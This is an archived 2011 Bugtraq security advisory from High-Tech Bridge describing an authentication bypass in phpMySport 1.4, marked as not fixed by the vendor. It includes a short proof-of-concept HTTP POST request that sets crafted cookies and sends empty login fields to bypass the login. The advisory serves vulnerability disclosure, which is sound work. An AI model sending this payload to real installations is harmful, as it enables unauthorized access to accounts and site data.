| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <201101061814.p06IEF7u080020@htbridge.ch> Date: Thu, 6 Jan 2011 19:14:15 +0100 (CET) From: advisory@...ridge.ch To: bugtraq@...urityfocus.com Subject: Authentication bypass in phpMySport Vulnerability ID: HTB22774 Reference: http://www.htbridge.ch/advisory/authentication_bypass_in_phpmysport.html Product: phpMySport Vendor: phpMySport ( http://phpmysport.sourceforge.net/ ) Vulnerable Version: 1.4 Vendor Notification: 21 December 2010 Vulnerability Type: Authentication bypass Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: High Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input. Attacker can bypass authentication. The following PoC is available: POST /index.php?r=member&v1=login HTTP/1.1 Cookie: auto_connection=1; cle=1; Content-Type: application/x-www-form-urlencoded Content-Length: 21 login=&pass=&x=9&y=10
Powered by blists - more mailing lists